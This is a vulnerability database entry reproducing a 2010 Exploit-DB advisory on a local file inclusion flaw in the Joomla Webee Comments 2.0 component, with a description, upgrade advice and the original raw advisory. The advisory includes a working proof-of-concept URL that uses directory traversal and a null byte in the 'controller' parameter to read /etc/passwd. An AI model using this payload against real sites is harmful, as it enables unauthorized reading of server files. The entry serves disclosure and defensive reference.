Joomla Component Webee Comments Local File Inclusion Vulnerability

vendor:

Webee

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Webee

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:onnogroen.nl:webee:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Webee Comments Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in the com_webeecomment version 2.0 component for Joomla. An attacker can exploit this vulnerability to include arbitrary files from the local system, which can lead to the disclosure of sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable script. This can allow the attacker to include arbitrary files from the local system.

Mitigation:

Upgrade to the latest version of the com_webeecomment component for Joomla.

Source

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component Webee Comments Local File Inclusion Vulnerability
 
       Software : com_webeecomment version 2.0
       Vendor   : http://www.onnogroen.nl/webee/
       Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_webeecomment&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_webeecomment&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews kaka11 wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================================


  [o] April 08 2010 - GMT +07:00 Jakarta, Indonesia